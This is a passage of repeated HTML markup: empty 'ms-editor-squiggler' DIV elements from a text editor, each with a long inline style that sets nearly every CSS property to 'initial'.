-webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: 